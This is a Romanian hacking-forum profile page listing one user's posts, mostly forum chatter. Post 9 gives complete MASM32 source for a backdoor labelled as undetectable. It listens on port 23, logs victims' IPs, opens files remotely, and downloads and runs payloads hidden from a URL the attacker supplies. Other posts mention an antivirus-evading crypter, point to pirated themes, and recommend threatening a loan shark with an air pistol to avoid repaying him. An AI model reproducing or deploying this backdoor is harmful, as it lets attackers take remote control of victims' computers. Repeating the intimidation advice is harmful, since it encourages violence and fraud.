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Everything posted by sosetutza

  1. Nu adminii, moderatorii ... am mai patit si sa rezolvat.
  2. Am fost uploader, ma inteleg foarte bine cu toti.
  3. 1.Sa respectati regulile = Seed si sa nu comentati ca prostii. 2.Daca nu respecati numaru 1 aveti ban.Iar eu imi iau invitatia inapoi. 3.200+ posturi. 4.FARA PM-uri, postati aici email.
  4. E tare ideea:P PS : poligraful nu iti poate spune daca minti sau nu, cand raspunzi la intrebare daca esti calm iti da adevarat iar daca esti stresat iti da fals.
  5. Am eu pentru multiupload. Da-mi un PM. Demo
  6. Faci tot ce vrei la el pe localhost , cand vrei sa il muti modifici config.php cu datele de la host , il copiezi pe host, apoi dai export la baza de date si o pui si aia pe host.
  7. DA. [The message you have entered is too short. Please lengthen your message to at least 10 characters.]
  8. Daca vrei teme premium pentru wordpress intra pe rockettheme si alegeti tema apoi intri pe scriptmafia.org si acolo o gasesti free.
  9. [FUD] ;Released 5/29/2011 ;Connect via telnet to the ip of server on port 23 [Am pus doar sursa sa nu il poata folosi tot prostu] Commands Download and execute = dl <your url> Open client file = Open <file path> Send messagebox = box <your text> Send GDI Desktop draw = msg <your text> Open cd drive = cdopen close cd drive = cdclose Kill your connection = bye Kill the server = kill .486p .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\wsock32.inc include \masm32\include\urlmon.inc include \masm32\include\kernel32.inc include \masm32\include\gdi32.inc include \masm32\include\winmm.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\wsock32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\gdi32.lib includelib \masm32\lib\winmm.lib include \masm32\include\shell32.inc includelib \masm32\lib\shell32.lib includelib \masm32\lib\urlmon.lib .data ClassName db "Remote Annoyance",0 AppName db "Remote Annoyance",0 fname1 db "C:\Windows\win32parser.brk",0 ftxt1 db "connected from : ",0 welcome db "@RSTCenter.com",0 killed db "You killed that poor Server..! ",13,10,0 thankz db "bye.... ",13,10,0 gotit db "ok..... ",0 errrr db "error.. ",0 cm00 db "open",0 cm01 db "box",0 cm02 db "kill",0 cm03 db "bye",0 cm04 db "cd",0 file db "c:\windows\win32bitparser.exe",0 cm05 db "line",0 cm06 db "msg",0 cm07 db "dl",0 mci1 db "set cdaudio door open",0 mci2 db "set cdaudio door closed",0 mci3 db 0 buff db 512 dup (0) buff2 db 512 dup (0) .data? s1 SOCKET ? s2 SOCKET ? sin1 sockaddr_in <> sin2 sockaddr_in <> wsaData WSADATA <> hFile dd ? fwritten dd ? temp dd ? deskdc HDC ? .code start: invoke WSAStartup,0101h,ADDR wsaData invoke socket,PF_INET,SOCK_STREAM,0 mov s1,eax mov ax,AF_INET mov sin1.sin_family,ax xor eax,eax mov sin1.sin_addr,eax invoke htons,23 ;Connection Port mov sin1.sin_port,ax invoke bind,s1,ADDR sin1,SIZEOF sockaddr_in cmp eax,SOCKET_ERROR jne @F invoke WSACleanup xor eax,eax call clrbuff ret @@: invoke listen,s1,1 next_user: invoke closesocket,s2 mov eax,SIZEOF sockaddr_in mov temp,eax invoke accept,s1,ADDR sin2,ADDR temp mov s2,eax invoke send,s2,ADDR welcome,SIZEOF welcome,0 invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0, OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov hFile,eax invoke SetFilePointer,hFile,0,0,FILE_END mov eax,sin2.sin_addr ;get IP address of user invoke inet_ntoa,eax mov temp,eax mov edi,OFFSET buff2 invoke lstrcpy,edi,ADDR ftxt1 add edi,SIZEOF ftxt1 invoke lstrcpy,edi,temp invoke lstrlen,temp add edi,eax mov eax,0a0d0000h mov [edi],eax add edi,4 mov eax,edi sub eax,OFFSET buff2 mov temp,eax ; log new connection to C:\Server.log invoke WriteFile,hFile,ADDR buff2,eax,ADDR fwritten,0 invoke send,s2,ADDR buff2,temp,0 invoke send,s2,ADDR gotit,SIZEOF gotit,0 invoke CloseHandle,hFile next_command: mov edi,OFFSET buff mov eax,SIZEOF buff call clrbuff mov edi,OFFSET buff crecv: invoke recv,s2,edi,500,0 or eax,eax jz next_user cmp eax,SOCKET_ERROR je next_user add edi,eax mov al,[edi-1] cmp al,08h jne @F xor eax,eax mov [edi],ax dec edi dec edi @@: cmp al,0Ah jne crecv invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0, OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov hFile,eax ; log commands to file C:\Server.log invoke SetFilePointer,hFile,0,0,FILE_END invoke lstrlen,ADDR buff invoke WriteFile,hFile,ADDR buff,eax,ADDR fwritten,0 invoke CloseHandle,hFile invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm06 invoke lstrcmpi,ADDR buff2,ADDR cm06 or eax,eax jz dmsg invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm07 invoke lstrcmpi,ADDR buff2,ADDR cm07 or eax,eax jz download invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm05 invoke lstrcmpi,ADDR buff2,ADDR cm05 or eax,eax jz dline invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm04 invoke lstrcmpi,ADDR buff2,ADDR cm04 or eax,eax jz cdrom invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm03 invoke lstrcmpi,ADDR buff2,ADDR cm03 or eax,eax jz byebye invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm02 invoke lstrcmpi,ADDR buff2,ADDR cm02 or eax,eax jz killer invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm01 invoke lstrcmpi,ADDR buff2,ADDR cm01 or eax,eax jz msgbx invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm00 invoke lstrcmpi,ADDR buff2,ADDR cm00 or eax,eax jnz err invoke lstrlen,OFFSET buff mov edx,OFFSET buff xor ebx,ebx mov [edx+eax-2],ebx add edx,5 invoke ShellExecute,NULL,ADDR cm00,edx,NULL,NULL,SW_SHOWNORMAL invoke send,s2,ADDR gotit,SIZEOF gotit,0 jmp next_command err: invoke send,s2,ADDR errrr,SIZEOF errrr,0 jmp next_command download: mov eax,OFFSET buff add eax,3 Invoke URLDownloadToFile,0,eax,ADDR file,0,0 Invoke WinExec, Addr file , SW_HIDE invoke send,s2,ADDR gotit,SIZEOF gotit,0 jmp next_command msgbx: mov eax,OFFSET buff add eax,3 mov ebx,MB_OK or ebx,MB_TOPMOST or ebx,MB_SYSTEMMODAL or ebx,MB_ICONINFORMATION invoke MessageBox,NULL,eax,ADDR AppName,ebx invoke send,s2,ADDR gotit,SIZEOF gotit,0 jmp next_command dline: invoke GetDC,0 mov deskdc,eax invoke MoveToEx,deskdc,100,300,NULL invoke LineTo,deskdc,250,100 invoke LineTo,deskdc,550,400 invoke LineTo,deskdc,600,430 invoke ReleaseDC,0,deskdc invoke send,s2,ADDR gotit,SIZEOF gotit,0 jmp next_command dmsg: invoke GetDC,0 mov deskdc,eax mov edx,36 mov [edi],edx invoke SelectObject,deskdc,eax invoke lstrlen,ADDR buff sub eax,3 sub eax,2 mov ecx,eax mov eax,OFFSET buff add eax,3 invoke TextOut,deskdc,100,200,eax,ecx invoke ReleaseDC,0,deskdc invoke send,s2,ADDR gotit,SIZEOF gotit,0 jmp next_command cdrom: mov edi,OFFSET buff mov eax,[edi+2] cmp eax,"nepo" ;open or close je cdopen cmp eax,"solc" jne err cdclose: invoke mciSendString,ADDR mci2,ADDR mci3,0,0 invoke send,s2,ADDR gotit,SIZEOF gotit,0 jmp next_command cdopen: invoke mciSendString,ADDR mci1,ADDR mci3,0,0 invoke send,s2,ADDR gotit,SIZEOF gotit,0 jmp next_command clrbuff: xor edx,edx mov [edi],edx add edi,4 mov ebx,[edi] test ebx,ebx jnz clrbuff ret byebye: invoke send,s2,ADDR thankz,SIZEOF thankz,0 jmp next_user killer: invoke send,s2,ADDR killed,SIZEOF killed,0 invoke closesocket,s1 invoke closesocket,s2 invoke WSACleanup xor eax,eax ret end start
  10. 1.Wordpress 2.Drupal 3.Joomla
  11. Care colaborare pana acuma ma...ca ai doar 3 posturi si astea au fost facute aici !
  12. As posta eu un cripter da imi e frica ca se gaseste un prost si il scaneaza pe virustotal. Ontopic: In sfarsit ceva bun!
  13. mda...Taceti din gura toti si treceti peste ca nu va strica.
  14. Tot WoW ramane cel mai jucat joc din lume, deci ala e si cel mai tare mmorpg.
  15. Pe ce planeta traiesti?
  16. sosetutza

    hi2 invite

    DONE! (The message you have entered is too short. Please lengthen your message to at least 10 characters.)
  17. E destul de vechi siteul dar foarte interesant:))
  18. Nu e un fel de a te da mare, am avut o gramada de probleme cu ei si acum le-am dovedit ca sunt oameni mai mari ca ei.
  19. Mergeti frumos la camatar , de preferat sa fie unu mai "mic" , luati banii cat va trebuie + inca 250 ron, apoi mergeti acasa intrati pe okazii cumparati un pistol cu aer comprimat si asteptati ziua platii.Cand va intalnitii ii spui ca nu o sa mai vada banii niciodata si ii areti pistolul. PS: Cand iei banii sa ai 2 martori sau ceva dovada ca ti-a dat bani. Metoda functioneaza 100% , e testata de mine:)) EPIC
  20. Nu exista asemenea "hack".
  21. sosetutza


    sosetutza, Bebee, d4ny90, demisec, little123, M4T3!, parazitul29, RipKid, silvian0 mai multi mai multi _|_ (o_o) _|_ )
  22. sosetutza


    Dokil Registered user Site AdminBautor de gin Join Date: Sep 2010 Posts: 226 Rep Power: 0 Facetimi ip-u si emailu publice sa imi dea oamenii flood:))
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